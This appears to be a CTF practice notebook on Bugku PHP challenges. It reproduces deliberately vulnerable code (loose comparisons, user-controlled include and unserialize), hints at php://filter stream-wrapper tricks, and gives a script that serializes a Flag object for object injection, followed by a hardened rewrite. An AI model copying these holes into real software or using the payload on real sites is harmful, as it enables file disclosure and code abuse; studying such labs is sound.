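Daily homework
never give up
<?php
if(!$_GET['id'])
{
    header('Location:hello.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
// stripos() returns 0 (falsy) when '.' is the first character of $a
if(stripos($a,'.'))
{
    echo 'no no no no no no no';
    return;
}
// $a is used as a stream/path name; errors are suppressed with @
$data = @file_get_contents($a,'r');
// loose (==, !=) comparisons throughout; eregi() is the legacy regex function removed in PHP 7
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
    require("f4l2a3g.txt");
}
else
{
    print "never never never give up !!!";
}
?>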
The flag is in f4l2a3g.txt; access it directly.
welcome to bugkuctf
View the source code; the approach is again PHP pseudo-protocols (stream wrappers).
Clever uses of php://filter
https://www.leavesongs.com/PENETRATION/php-filter-magic.html
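The index.php that was read:
<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];
// $txt is opened as a stream/path and its contents compared strictly
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
    echo "hello friend!<br>";
    // only the literal substring "flag" is blocked in $file
    if(preg_match("/flag/",$file)){
        echo "不能现在就给你flag哦";
        exit();
    }else{
        // user-controlled include, then user-controlled unserialize
        include($file);
        $password = unserialize($password);
        echo $password;
    }
}else{
    echo "you are not the number of bugku ! ";
}
?>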
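PHP code from someone else that I ran:
<?php
class Flag{//flag.php
    public $file; // declared explicitly; the original set it dynamically
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return("good");
        }
    }
}
$a = new Flag();
$a->file="flag.php";
// print the serialized form of the object
print_r(serialize($a));
?>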
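For comparison, a hardened variant of the index.php above, written as an added example and not part of the original challenge or writeup. It compares txt as a plain value, maps file through an allowlist, and refuses objects in unserialize; the page names in PAGES and the helper names are assumptions.

```php
<?php
// Added example: hardened counterpart of the index.php shown above.
// PAGES entries and helper names are hypothetical, chosen for illustration.
declare(strict_types=1);

const PAGES = [                 // allowlist: request key => fixed file on disk
    'home' => 'home.php',
    'hint' => 'hint.php',
];

/** Return a GET parameter only if it is a plain string (arrays are dropped). */
function param(string $name): string
{
    $v = $_GET[$name] ?? '';
    return is_string($v) ? $v : '';
}

/** Map a request key to an allowlisted file, or null if unknown. */
function resolve_page(string $key): ?string
{
    // User input never becomes a path, so php://filter, data:// and
    // directory traversal have nothing to act on.
    return PAGES[$key] ?? null;
}

/** Accept a serialized string only; no class is ever instantiated. */
function decode_password(string $raw): ?string
{
    // allowed_classes => false turns any object into __PHP_Incomplete_Class,
    // so a Flag object with __tostring() cannot be revived from the request.
    $value = @unserialize($raw, ['allowed_classes' => false]);
    return is_string($value) ? $value : null;
}

$page = resolve_page(param('file'));
$pass = decode_password(param('password'));

// txt is compared as a value instead of being opened with file_get_contents().
if (!hash_equals('welcome to the bugkuctf', param('txt')) || $page === null || $pass === null) {
    http_response_code(400);
    exit('bad request');
}

echo 'hello friend!<br>';
include __DIR__ . '/' . $page;                       // always one of PAGES
echo htmlspecialchars($pass, ENT_QUOTES, 'UTF-8');   // escape before output
```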